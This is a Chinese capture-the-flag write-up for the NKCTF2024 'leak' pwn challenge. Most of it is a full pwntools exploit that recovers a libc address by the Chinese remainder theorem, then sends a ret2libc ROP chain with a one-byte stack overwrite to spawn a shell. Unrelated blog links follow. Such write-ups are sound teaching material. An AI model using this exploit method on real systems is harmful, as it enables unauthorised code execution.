[NKCTF2024]-PWN:leak解析(中国剩余定理泄露libc地址,汇编覆盖返回地址)

查看保护

查看ida

先放exp

完整exp:

复制代码
from pwn import*
from sympy.ntheory.modular import crt
context(log_level='debug',arch='amd64')

while True:
    p=process('./leak')
    ps=[101,103,107,109,113,127]
    p.sendafter(b'secret\n',bytes(ps))
    cs=[0]*6
    for i in range(6):
        cs[i]=u32(p.recv(1).ljust(4,b'\x00'))
    print(hex(cs[i]))
    onestack=u32(p.recv(1).ljust(4,b'\x00'))
    if onestack+0x58>0xff:
        p.close()
        continue
    print("onestack"+hex(onestack))
    res=crt(ps,cs)[0]
    n=1
    for i in range(0,6):
        n*=ps[i]
    c=0
    stdout=0
    while True:
        stdout=res+c*n
        if (stdout>>44)==0x07:
            if (stdout&0xfff)==0x780:
                break
        c+=1
        assert c<100
    libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    libcbase=stdout-libc.sym['_IO_2_1_stdout_']
    ret=libcbase+0x29139
    pop_rdi=libcbase+0x2a3e5
    system=libcbase+libc.sym['system']
    binsh=libcbase+next(libc.search(b'/bin/sh'))
    payload=p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p8((onestack+0x58)&0xff)
    p.send(payload)
    #p.send(b'aa')

    p.interactive()
    break

#解释点1:这里是接收程序输出的六次结果来解中国剩余定理来算出stdout的地址,算出libc基地址。

#解释点2:这里最后覆盖一个字节的栈地址是为了把payload全覆盖到返回地址上去。这个是从汇编指令上看的

这里把地址移动到rcx之后就以rcx内的值来确定移动位置,因为rbp+buf的位置存的是栈上地址,如果我们把最后一个字节覆盖掉就可以控制rcx的值,从而控制payload移动的位置,执行getshell。

相关推荐
磐链科技2 分钟前
区块链链游安全警示:常见漏洞与攻击手段
安全·区块链
数据知道2 小时前
HTTP/HTTPS 安全深度剖析:抓包、解密与证书陷阱
安全·http·https·mitmproxy·抓包解密
AI创界者2 小时前
安全测试环境搭建:在 Kali Linux 中部署与配置开源 WebShell 管理工具 AntSword(蚁剑)
linux·运维·安全
深盾科技_Virbox4 小时前
软件授权工具静默安装实践
java·运维·数据库·安全·软件需求
এ慕ོ冬℘゜4 小时前
前端核心知识体系进阶:从安全机制、网络协议到原生 JS 实战全解析
前端·网络协议·安全
延凡科技4 小时前
延凡科技综合监控预警处置平台—— 一体化视频AI安防闭环系统设计与功能实现[特殊字符]️
数据库·人工智能·科技·安全·能源
Amy187021118234 小时前
筑牢算力底座的安全防线:直流绝缘监测如何为固态变压器保驾护航
安全
HackTwoHub4 小时前
AI大模型攻击思路,涵盖提示词劫持、知识库投毒、多语种混淆 + 身份伪装、诱导 AI 输出涉密后台核心配置
人工智能·安全·web安全·网络安全·自动化·系统安全·安全架构
Kyrie6785 小时前
为什么我们不能等待更好的后量子签名算法
安全
长风2305 小时前
Day 16:大屏呈现——管理层视角 Dashboard 设计
人工智能·安全